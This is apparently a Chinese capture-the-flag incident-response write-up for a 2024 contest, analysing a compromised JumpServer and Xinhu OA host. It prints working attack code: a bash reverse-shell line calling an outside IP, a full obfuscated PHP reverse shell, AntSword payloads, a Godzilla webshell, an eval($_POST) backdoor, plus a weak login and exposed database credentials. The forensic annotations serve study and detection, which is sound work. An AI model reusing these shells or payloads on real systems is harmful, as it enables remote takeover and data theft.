2024“中华武数杯” 全国网络攻防精英赛
场景2
弱密码登录
开始是一个 JumpServer 后台登录,尝试弱密码 admin/admin123 进入
注意不要爆破不然会被禁止30分钟
后门账户
在用户管理页面找到管理用户,发现有两个,其中一个是后门账户
黑客后门程序
查看进程和对应端口
ps -aux
找到进程执行反弹shell命令
bash -c bash -i >& /dev/tcp/181.32.44.99/9898 0>&1 &
或者看网络连接
netstat -anlupt
之后在 tmp 目录找到一个 baidu.php 后门,并将混淆代码的输出写到了注释里面
<?php
# Forensic annotation (found as tmp/baidu.php): a PHP reverse shell whose control flow
# was flattened into goto/label pairs and whose string literals were rewritten as
# octal/hex escapes. The decoded literal is noted beside each line. Apart from that
# flattening and the isHttpAlive() pre-check, the pieces match the widely circulated
# pentestmonkey php-reverse-shell pattern (presumably a re-obfuscation of it).
# Execution order once the gotos are followed, starting at xVmgn:
#   set_time_limit(0) -> $VERSION -> $ip -> $port -> $chunk_size -> $write_a -> $error_a
#   -> $shell -> $daemon -> $debug -> isHttpAlive($ip) or exit -> fork + setsid -> chdir("/")
#   -> umask(0) -> fsockopen -> $descriptorspec -> proc_open -> stream_set_blocking x4
#   -> "Successfully opened reverse shell" -> relay loop -> fclose x4 -> proc_close.
# Observable behaviour for detection: an HTTP GET to http://181.32.44.99/ followed by an
# outbound TCP connection to 181.32.44.99:9898, and a child process running
# "uname -a; w; id; bash -i" under the web-server user with cwd "/".
goto xVmgn;
fqEt0:
# The three shell pipes and the socket are switched to non-blocking so the relay loop
# can multiplex them with stream_select().
stream_set_blocking($pipes[0], 0);
goto InVPF;
IeHeL:
proc_close($process);
goto xV3Uc;
gXRc1:
# Relay loop: copies socket -> shell stdin and shell stdout/stderr -> socket until either
# side reaches EOF. $chunk_size, $debug, $sock and $pipes are the top-level variables.
while (1) {
if (feof($sock)) {
#ERROR: Shell connection terminated
printit("\x45\122\122\117\x52\x3a\x20\x53\x68\145\x6c\154\40\143\x6f\156\156\145\143\x74\x69\x6f\156\x20\x74\145\x72\155\151\x6e\141\x74\x65\x64");
break;
}
if (feof($pipes[1])) {
#ERROR: Shell process terminated
printit("\105\x52\122\x4f\x52\72\40\x53\x68\x65\x6c\x6c\x20\x70\x72\x6f\143\145\x73\x73\40\x74\145\x72\155\x69\x6e\141\x74\x65\144");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
# blocks (timeout null) until at least one of the three streams is readable
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
#SOCK READ
printit("\x53\117\103\113\40\122\105\101\104");
}
$input = fread($sock, $chunk_size);
if ($debug) {
#SOCK: {$input}
printit("\x53\x4f\x43\113\x3a\x20{$input}");
}
# attacker input goes to the shell's stdin
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
#STDOUT READ
printit("\x53\124\104\x4f\125\x54\40\122\105\x41\104");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
#STDOUT: {$input}
printit("\123\x54\x44\x4f\x55\124\x3a\x20{$input}");
}
# shell stdout goes back over the socket
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
#STDERR READ
printit("\x53\x54\x44\x45\x52\x52\40\122\105\x41\104");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
#STDERR: {$input}
printit("\123\x54\x44\x45\x52\x52\x3a\x20{$input}");
}
# shell stderr goes back over the socket as well
fwrite($sock, $input);
}
}
goto AZd0U;
rTceL:
#pcntl_fork — daemonise when the extension is present: the parent exits (die(0)),
#the child detaches with posix_setsid(). On hosts without pcntl it simply carries on
#in the web-server request, which is what the WARNING below says.
if (function_exists("\160\x63\156\164\154\137\146\157\x72\x6b")) {
$pid = pcntl_fork();
if ($pid == -1) {
#ERROR: Can't fork
printit("\x45\x52\122\117\x52\72\40\103\x61\x6e\47\164\40\x66\x6f\x72\x6b");
die(1);
}
if ($pid) {
die(0);
}
if (posix_setsid() == -1) {
#Error: Can't setsid()
printit("\x45\x72\x72\x6f\162\72\x20\103\141\x6e\47\164\x20\x73\x65\164\x73\151\x64\x28\51");
die(1);
}
$daemon = 1;
} else { #WARNING: Failed to daemonise.  This is quite common and not fatal.
printit("\x57\101\122\116\x49\116\x47\72\40\106\141\x69\154\x65\x64\x20\x74\157\40\x64\141\145\x6d\x6f\x6e\151\163\145\x2e\40\40\x54\150\x69\x73\40\x69\x73\x20\161\x75\x69\x74\145\x20\143\x6f\x6d\155\157\156\x20\141\x6e\144\40\x6e\x6f\164\x20\x66\x61\164\x61\x6c\x2e");
}
goto jmHuA;
RlaS8:
#"{$errstr} ({$errno})" — exit if the connect-back to $ip:$port failed
if (!$sock) {
printit("{$errstr}\x20\x28{$errno}\51");
die(1);
}
goto Uge_Q;
InVPF:
stream_set_blocking($pipes[1], 0);
goto JANIF;
QHXRE: #Successfully opened reverse shell to {$ip}:{$port}
printit("\123\x75\143\143\x65\163\163\146\165\154\154\x79\40\157\160\x65\x6e\145\144\40\x72\x65\166\145\162\163\145\x20\163\x68\145\x6c\x6c\x20\164\157\40{$ip}\x3a{$port}");
goto gXRc1;
Zq8k_:
$error_a = null;
goto Wo4xn;
Wo4xn: #uname -a; w; id; bash -i  — the command line handed to proc_open()
$shell = "\x75\x6e\x61\x6d\145\x20\x2d\x61\x3b\x20\167\x3b\x20\x69\x64\73\40\142\x61\163\150\x20\x2d\x69";
goto YKN_Y;
r30Sz:
fclose($pipes[1]);
goto O9FZs;
xVmgn:
# Entry point: no execution time limit, so the relay loop can run indefinitely.
set_time_limit(0);
goto NGebl;
xcFTT: #ERROR: Can't spawn shell
if (!is_resource($process)) {
printit("\x45\122\122\x4f\x52\72\x20\103\x61\x6e\x27\164\40\x73\160\141\x77\156\40\163\x68\x65\x6c\x6c");
die(1);
}
goto wkPUB;
qcImP: #181.32.44.99 — C2 address (same host as the /dev/tcp reverse shell seen in ps)
$ip = "\x31\x38\x31\x2e\63\62\56\64\64\56\71\x39";
goto uNuVg;
YKN_Y:
$daemon = 0;
goto BzzaA;
JANIF:
stream_set_blocking($pipes[2], 0);
goto Di1ZG;
Uge_Q: #array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"))
$descriptorspec = array(0 => array("\x70\151\160\145", "\x72"), 1 => array("\160\x69\160\x65", "\x77"), 2 => array("\x70\x69\x70\145", "\167"));
goto PE2Nh;
wkPUB:
# Liveness check added on top of the classic reverse shell: true only when an HTTP GET
# to http://$ip answers with a status line containing "200". The script exits silently
# before connecting when the check fails. (strpos() without "!== false" would misread a
# match at offset 0, but a status line starts with "HTTP/", so it behaves as intended.)
function isHttpAlive($ip, $timeout = 2)
{ #http://{$ip}
$url = "\150\164\x74\160\x3a\x2f\57{$ip}";
#array("http" => array("timeout" => $timeout))
$context = stream_context_create(array("\150\x74\x74\x70" => array("\164\x69\155\145\x6f\x75\x74" => $timeout)));
$headers = @get_headers($url, 0, $context);
#"200"
if ($headers && strpos($headers[0], "\x32\x30\60")) {
return true;
}
return false;
}
goto fqEt0;
pRr2Z:
# bytes read per fread() in the relay loop
$chunk_size = 1400;
goto dSZoi;
NhUwH:
fclose($pipes[0]);
goto r30Sz;
Di1ZG:
stream_set_blocking($sock, 0);
goto QHXRE;
DtngS:
umask(0);
goto xfXIP;
xV3Uc:
# Prints $string followed by "\n" unless daemonised. Note: $daemon is read without a
# `global` declaration, so inside this function it is always unset and the message is
# printed regardless of whether the fork succeeded.
function printit($string)
{
if (!$daemon) {
#"{$string}\n"
print "{$string}\12";
}
}
goto AObOM;
AZd0U:
# Teardown after the relay loop ends: socket, the three pipes, then the process.
fclose($sock);
goto NhUwH;
NGebl:
#"1.0"
$VERSION = "\x31\x2e\60";
goto qcImP;
O9FZs:
fclose($pipes[2]);
goto IeHeL;
uNuVg:
$port = 9898;
goto pRr2Z;
xfXIP:
# Connect-back to the C2 with a 30 s timeout; $errno/$errstr are reported on failure.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
goto RlaS8;
PE2Nh:
# Spawns the interactive shell with stdin/stdout/stderr attached to $pipes.
$process = proc_open($shell, $descriptorspec, $pipes);
goto xcFTT;
BzzaA:
$debug = 0;
goto FhswA;
dSZoi:
$write_a = null;
goto Zq8k_;
FhswA:
# Quiet exit unless the C2 host is reachable over HTTP (see isHttpAlive()).
if (!isHttpAlive($ip)) {
die(0);
}
goto rTceL;
jmHuA:
#chdir("/")
chdir("\x2f");
goto DtngS;
AObOM:
场景一
Vulnerability-Wiki/docs-base/docs/oa/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki
CVE-2023-1501
POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=769871 HTTP/1.1
发现请求中有代码传入,是 CVE-2023-1773
http://39.101.137.133/?p=webmain&d=system&m=cog%7Ccog&ajaxbool=true&a=savecong
原文已经给了修改密码的步骤
后面寻找修改的密码
并且之后rce是将代码写入配置文件webmainConfig.php
流量中的木马命令
第一次传参的RCE代码可以看到如下
<?php
// Forensic annotation: first AntSword (蚁剑) PHP payload seen in the captured traffic.
// Shape: an open_basedir bypass (only when a restriction is set), two helpers, then a
// try block whose buffered output is wrapped in the fixed markers "c8654" ... "20a81404fc0"
// so the client can cut the real result out of the HTTP response. Every call is
// @-suppressed, so nothing from this reaches the PHP error log.
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
// one element per path segment of the open_basedir value (either slash style)
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
// transient dotted directory created under the script's directory — the main on-disk trace
$tmdir = ".4fcb9f3038fe";
@mkdir($tmdir);
@chdir($tmdir);
// narrow open_basedir to "..", climb one level per segment, then widen it to "/"
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
// remove the marker directory again
@rmdir($ocwd . "/" . $tmdir);
};
// Identity "encoder": this payload returns its output in clear text.
function asenc($out)
{
return $out;
};
// Flushes the output buffer between the two fixed marker strings.
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "c8" . "654";
echo @asenc($output);
echo "20a81" . "404fc0";
}
ob_start();
try {
// Host fingerprint: script directory, root or existing drive letters, php_uname(), user.
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
// NOTE(review): the response captured later in the writeup shows these separators as
// tabs; the whitespace inside the literals here may have been altered by the capture.
$R = "{$D} ";
if (substr($D, 0, 1) != "/") {
// Windows: probe which drive letters C: .. Z: exist
foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
} else {
$R .= "/";
}
$R .= " ";
// checks for posix_getegid() but then calls posix_getpwuid()/posix_geteuid() (as written)
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= " {$s}";
echo $R;;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
最终结果突破open_basedir的限制,获取到了当前目录的路径以及用户名和系统信息
第二个解密流量的命令代码如下
<?php
// Forensic annotation: second AntSword (蚁剑) payload, identical in structure to the first
// one; only the temp directory name and the response markers "151b39961" ... "a4e42039d"
// differ. The captured response (shown below in the writeup) begins and ends with exactly
// those markers, with tab-separated fields in between.
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir bypass, only when a restriction is configured
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
// transient dotted directory under the script's directory — the main on-disk trace
$tmdir = ".51d10df2";
@mkdir($tmdir);
@chdir($tmdir);
// narrow to "..", climb one level per open_basedir segment, then widen to "/"
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($ocwd . "/" . $tmdir);
};
// Identity "encoder": output is sent in clear text.
function asenc($out)
{
return $out;
};
// Flushes the output buffer between the two fixed marker strings.
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "151b" . "39961";
echo @asenc($output);
echo "a4e4" . "2039d";
}
ob_start();
try {
// Host fingerprint: script directory, drive letters / root, php_uname(), user name.
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
// NOTE(review): separators appear as tabs in the captured response; the whitespace in
// these literals may have been altered by the capture.
$R = "{$D} ";
if (substr($D, 0, 1) != "/") {
// Windows branch (the captured response shows "C:" here, so this branch ran)
foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
} else {
$R .= "/";
}
$R .= " ";
// checks for posix_getegid() but calls posix_getpwuid()/posix_geteuid() (as written);
// on Windows the fallback get_current_user() path is what produced "Administrator"
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= " {$s}";
echo $R;;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
获取到了当前目录的位置以及windows主机名字和用户名
流量中响应结果
151b39961C:/phpstudy_pro/WWW\tC:\tWindows NT OA 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64\tAdministratora4e42039d
第四次
<?php
// Forensic annotation: fourth AntSword (蚁剑) request. Same wrapper as the earlier
// payloads (open_basedir bypass, identity encoder, markers "c6088f362" ... "ef2f47"),
// but the body is a file-write primitive: the target path and the file content both
// come from POST parameters, base64-decoded after dropping the first two characters.
// Per the writeup the path was C:/phpstudy_pro/WWW/upload/config.php and the content
// the Godzilla webshell analysed below. The response is just "1" or "0".
@ini_set("display_errors", "0");
@set_time_limit(0);
// open_basedir bypass, only when a restriction is configured
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
// transient dotted directory under the script's directory — the main on-disk trace
$tmdir = ".3ecc860f";
@mkdir($tmdir);
@chdir($tmdir);
// narrow to "..", climb one level per open_basedir segment, then widen to "/"
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($ocwd . "/" . $tmdir);
};
// Identity "encoder": output is sent in clear text.
function asenc($out)
{
return $out;
};
// Flushes the output buffer between the two fixed marker strings.
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "c608" . "8f362";
echo @asenc($output);
echo "ef2" . "f47";
}
ob_start();
try {
// fopen(path, "w") truncates/creates the file; fwrite's result decides "1" / "0".
// Both POST field names are random per session, so detection should key on the
// base64(substr(...)) shape and the marker strings rather than on the names.
echo @fwrite(fopen(base64_decode(substr($_POST["c32fac3bd31b3"], 2)), "w"), base64_decode(substr($_POST["q96d98f37ce4ea"], 2))) ? "1" : "0";;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
传参的文件名如下,也就是把内容写入了 config.php,根据后续访问可以知道是一个哥斯拉木马
C:/phpstudy_pro/WWW/upload/config.php ·
#Halo AntSword!
第五次上传了一个webshell搜索发现是哥斯拉马
哥斯拉PHP马逐句解析 - 芥末炸弹 - 博客园
<?php
// Forensic annotation: Godzilla-style (哥斯拉) PHP XOR/base64 webshell, the file written
// as upload/config.php by the AntSword request above.
// Protocol as written here:
//   request  : POST field "pass123" = base64(XOR(data, key))
//   stage    : the first request whose decoded data contains "getBasicsInfo" is stored
//              (XORed again) in $_SESSION['payload']; nothing is executed on that request
//   later    : the stored stage is decoded and eval()ed, which defines run(); the new
//              command is passed to run() and its result is XORed + base64-encoded
//   response : "<!DOCTYPE html><html lang="en">var Re<5 hex>_config=<base64>;..." dressed
//              up as a Baidu share-button script, then "</body></html>"
@session_start();
@set_time_limit(0);
@error_reporting(0);
/**
 * Byte-wise XOR with a 16-byte key; applying it twice restores the input.
 * Precedence note: `$i + 1 & 15` is `($i + 1) & 15`, so byte (i+1) mod 16 of $K is used.
 */
function encode($D, $K){
for ($i = 0; $i < strlen($D); $i++) {
$c = $K[$i + 1 & 15];
$D[$i] = $D[$i] ^ $c;
}
return $D;
}
$pass = 'pass123';           // POST parameter that carries the command
$payloadName = 'payload';    // session key holding the planted stage
$key = '63064e0e3090705b';   // 16-byte XOR key hardcoded in the shell
if (isset($_POST[$pass])) {
// decode this request's command
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
// stage already planted: decode it from the session ...
$payload = encode($_SESSION[$payloadName], $key);
// ... and XOR once more if the result does not look like the stage (fallback as written)
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
// defines run() (and whatever else the stage carries) for this request
eval($payload);
// response prefix: first 5 hex chars of md5(pass . key) spliced into the fake JS name
$left = substr(md5($pass . $key), 0, 5);
$replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
header('Content-Type: text/html');
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo $replacedString;
// run() executes the decoded command; its output is XORed and base64-encoded
echo base64_encode(encode(@run($data),$key));
echo ";";
// NOTE(review): the tail of this literal is mangled in the capture (non-printable bytes
// after "shell_v2.js"); the original is presumably a longer script-tag disguise.
echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js6················5·······························4(························s···········V6···r··`I··B·········X··· ······\· ·';
echo '</body>';
echo '</html>';
} else {
// first contact: only a stage containing "getBasicsInfo" is accepted and kept in the session
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}
pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。
D盾扫了一下找到后门config.php和上面流量分析的一致
隐藏后门为 webmain\webmainConfig.php,也是流量中利用信呼OA的RCE漏洞写入配置文件的,与上面分析的一致
<?php
// Forensic annotation (webmain/webmainConfig.php): the OA's generated configuration
// file. The eval() line below is not part of the product template: eval($_POST[1]) runs
// any PHP sent in POST parameter "1" whenever the application includes this file, i.e. a
// one-line webshell. Per the writeup it was written here through the system-settings
// save endpoint (the CVE-2023-1773 RCE); the "//[" / "//]" markers presumably delimit
// what that endpoint spliced in. Every credential and key in this file should be treated
// as exposed and rotated during remediation.
if(!defined('HOST'))die('not access');
//[
eval($_POST[1]);//] configuration file saved/modified on 2024-11-16 19:52:49 via [System -> System Tools -> System Settings]
return array(
'url' => '', // System URL
'localurl' => '', // Local system URL, used for browsing addresses on the server
'title' => '信呼协同办公系统', // Default system title
'apptitle' => '信呼OA', // Title shown in the app and the mobile web version
'db_host' => '127.0.0.1', // Database host
'db_user' => 'root', // Database user name
'db_pass' => 'CaQsC6zVR', // Database password
'db_base' => 'xinhu', // Database name
'db_engine' => 'MyISAM',
'perfix' => 'xinhu_', // Database table-name prefix
'qom' => 'xinhu_', // Session / cookie prefix
'highpass' => '', // Super-admin password; can be used to log in to any account
'db_drive' => 'mysqli', // Database driver: one of mysql, mysqli, pdo
'randkey' => 'pcywdgunofzqvsthbmxlraikje', // System random-string key
'asynkey' => 'c57fa9c833f4a2c4e208261dddfc9926', // Key for asynchronous tasks
'openkey' => '', // openkey for the external API
'updir' => 'upload',
'sqllog' => false, // Whether to write SQL logs under upload/sqllog
'asynsend' => '', // Whether reminders are sent asynchronously: 0 sync, 1 async on own server, 2 async via official-site VIP
'editpass' => '', // Password change on login: 0 not required, 1 forced
'install' => true, // Installed flag; do not remove
'xinhukey' => '', // Xinhu official-site key, used for online upgrades
'outurl' => '', // Address used to push messages to phones when accessed via an intranet address
'reimtitle' => '', // Title shown in REIM instant messaging
'qqmapkey' => '',
'platurl' => '',
'bcolorxiang' => '', // Default line colour on form detail pages
'officeyl' => '', // Document (Excel/Doc) preview type: 0 self-hosted plugin, 1 official site (any platform)
'useropt' => '', // 1 records user operations to the log; empty does not
'defstype' => '1', // PC back-office theme skin, 1 to 34
'officebj' => '', // Online document editing: 1 official site or self-hosted
'officebj_key' => '', // Online document editing agent key
'debug' => false, // true = debug/development mode, false = production mode
'reim_show' => false, // Whether to show REIM on the home page
'mobile_show' => false, // Whether to show the mobile version on the home page
'companymode' => false, // Multi-company mode; true enables it
'loginyzm' => '', // Login mode: 0 account+password only, 1 account+password or phone+code, 2 account+password+captcha, 3 phone+code only
'apptheme' => '', // Theme colour of the system or app
);